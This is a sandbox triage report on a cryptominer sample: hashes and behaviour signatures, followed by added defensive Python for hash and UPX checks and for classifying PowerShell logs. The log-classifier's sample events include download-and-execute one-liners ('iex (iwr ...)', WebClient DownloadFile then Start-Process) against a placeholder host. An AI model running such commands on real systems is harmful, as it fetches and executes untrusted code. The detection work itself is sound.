General

  • Target

    54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics

  • Size

    2.8MB

  • Sample

    240515-3h3wsaaa83

  • MD5

    54c425ba96686c0ab10c9eeb3d8381d0

  • SHA1

    ee8d10db98949f6eae7edfbb4f7a3a0c34465867

  • SHA256

    e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec

  • SHA512

    94175f8257c411529984ca7a16d8dc6bc131177f1afbb29b959c45de91d2acb94ed56bb7cc51b6ee4dad672682ef2de86c602f7264d8e9bada7dace55d1c610d

  • SSDEEP

    49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/Rk/:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rz

Targets

    • Target

      54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with the open-source UPX packer or a modified UPX build.

    • Legitimate hosting services abused for malware hosting/C2
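
The script below is an added example and is not the sandbox's own code. It covers two items from this report: checking that a local copy of the sample matches the digests listed under General, and reproducing the static side of the "UPX packed file" signature by parsing the PE section table and looking for the UPX0/UPX1 section names and the "UPX!" magic. The PE image it runs against is constructed inline (headers only, no real sample bytes), so the report's digests will not match it.

```python
"""Static triage for the sample above: confirm a local copy matches the
report's digests, then look for the markers behind the 'UPX packed file'
signature. Added example; not the sandbox's own code. The PE image used
for the demo is constructed here (headers only), not the real sample."""
import hashlib
import struct

# Digests copied from the report for this sample.
REPORTED = {
    "md5": "54c425ba96686c0ab10c9eeb3d8381d0",
    "sha1": "ee8d10db98949f6eae7edfbb4f7a3a0c34465867",
    "sha256": "e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec",
    "sha512": "94175f8257c411529984ca7a16d8dc6bc131177f1afbb29b959c45de91d2acb94ed56bb7cc51b6ee4dad672682ef2de86c602f7264d8e9bada7dace55d1c610d",
}
HASHES = ("md5", "sha1", "sha256", "sha512")


def digests(data: bytes) -> dict:
    """Compute the digests a sandbox report lists for a file."""
    return {name: hashlib.new(name, data).hexdigest() for name in HASHES}


def matches_report(data: bytes, reported: dict = REPORTED) -> bool:
    """True only if every digest in the report matches the local bytes."""
    local = digests(data)
    return all(local[name] == value for name, value in reported.items())


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional  # start of IMAGE_SECTION_HEADER[]
    names = []
    for i in range(number_of_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def upx_indicators(data: bytes) -> dict:
    """Stock UPX names its sections UPX0/UPX1 and writes a 'UPX!' magic;
    modified builds often rename the sections, so check both signals."""
    names = pe_section_names(data)
    upx_sections = [n for n in names if n.upper().startswith("UPX")]
    marker = b"UPX!" in data
    return {"sections": names, "upx_sections": upx_sections,
            "upx_marker": marker, "packed": bool(upx_sections) or marker}


def build_fake_pe(section_names, trailer=b"") -> bytes:
    """Constructed minimal MZ/PE image: no optional header, no section data."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, timestamp, symtab ptr, nsyms,
    # SizeOfOptionalHeader=0, Characteristics=EXECUTABLE_IMAGE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    table = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + table + trailer


# Constructed inputs: one that looks UPX-packed, one that does not.
PACKED = build_fake_pe(["UPX0", "UPX1", ".rsrc"], trailer=b"\0UPX!\0")
CLEAN = build_fake_pe([".text", ".rdata", ".data"])

if __name__ == "__main__":
    for label, blob in (("constructed packed", PACKED), ("constructed clean", CLEAN)):
        print(label, upx_indicators(blob), "matches report:", matches_report(blob))
```

Run it against the real file by reading the bytes and calling matches_report and upx_indicators; a false from matches_report means you are not looking at the same sample the report describes. A modified UPX that renames its sections and strips the magic defeats both checks, which is why the sandbox signature is only one input and the dynamic signatures (dropped EXE executed, dropped DLL loaded) carry more weight.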
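
The "Command and Scripting Interpreter: PowerShell" signature fires on an Invoke-WebRequest call. The detection logic below is an added example, not the sandbox's rule, and runs over constructed PowerShell script-block log text (the kind recorded as Event ID 4104 when script block logging is enabled). It separates a plain web request from a download-then-execute chain, which is the pattern that pairs with "Executes dropped EXE" and "Loads dropped DLL" in this report. The hostnames in the sample lines are placeholders.

```python
"""Classify PowerShell script-block text by web-request use and by whether
the fetched content is handed straight to an execution sink. Added example;
not the sandbox's signature. SAMPLE_EVENTS are constructed log lines."""
import re

# Invoke-WebRequest plus its Windows PowerShell aliases (wget/curl are
# aliases in Windows PowerShell 5.1, not in PowerShell 7) and Invoke-RestMethod.
WEB_REQUEST = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm)\b", re.I)
# .NET download primitives that bypass the cmdlet entirely.
DOTNET_DOWNLOAD = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|HttpClient", re.I)
# Sinks that turn downloaded content into code or a running process.
EXEC_SINK = re.compile(
    r"\b(?:iex|Invoke-Expression|Start-Process|rundll32|regsvr32)\b|\.Invoke\(", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

SAMPLE_EVENTS = [
    # Administrator pulling an installer to disk: web request, no exec sink.
    "Invoke-WebRequest -Uri https://aka.ms/installer.msi -OutFile C:\\Temp\\installer.msi",
    # Fetched script fed straight to Invoke-Expression (in-memory execution).
    "iex (iwr 'http://example-cdn.invalid/update.ps1' -UseBasicParsing).Content",
    # Stage a dropped EXE via .NET, then run it.
    "(New-Object Net.WebClient).DownloadFile('http://example-cdn.invalid/x.exe',"
    "'C:\\Users\\Public\\x.exe'); Start-Process C:\\Users\\Public\\x.exe",
    # No network activity.
    "Get-Process | Where-Object CPU -gt 100",
]


def score_script_block(text: str) -> dict:
    """Return the matched indicators and a verdict for one script block."""
    web_request = bool(WEB_REQUEST.search(text) or DOTNET_DOWNLOAD.search(text))
    exec_sink = bool(EXEC_SINK.search(text))
    if web_request and exec_sink:
        verdict = "download-and-execute"
    elif web_request:
        verdict = "web-request"
    else:
        verdict = "none"
    return {"web_request": web_request, "exec_sink": exec_sink,
            "urls": URL.findall(text), "verdict": verdict}


def triage(events) -> list:
    """Verdict per event, in input order, for feeding a SIEM rule or a report."""
    return [(score_script_block(e)["verdict"], e) for e in events]


if __name__ == "__main__":
    for verdict, event in triage(SAMPLE_EVENTS):
        print(f"{verdict:22} {event}")
```

The URL list is what you would pivot on when checking the "Legitimate hosting services abused for malware hosting/C2" signature: a download-and-execute verdict whose URL points at a public paste, CDN or code-hosting domain is the combination the sandbox is describing.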

MITRE ATT&CK Enterprise v15